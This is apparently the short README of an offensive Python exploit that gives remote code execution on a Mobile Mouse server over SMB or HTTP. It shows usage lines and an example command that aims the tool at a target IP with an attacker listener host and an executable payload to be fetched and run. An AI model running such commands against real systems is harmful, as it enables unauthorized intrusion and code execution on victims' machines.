The exploit has two versions, one that uses SMB and one that uses HTTP. It allows an attacker to execute arbitrary code on the target machine by sending a specially crafted request to the Mobile Mouse server.
v3 ( cmd) :
usage:
python mobilemouse.py --target TARGET --file FILE [--lhost LHOST]
usage :
python3 mobilemouse.py --target TARGET [--file FILE] [--lhost LHOST]
eg: python3 mobilemouse.py --target 192.168.1.12 --lhost 192.168.1.45 --file light.exe
This exploit is intended for educational and testing purposes only. The author is not responsible for any illegal or unauthorized use of this exploit. Use at your own risk.
Take The Rose!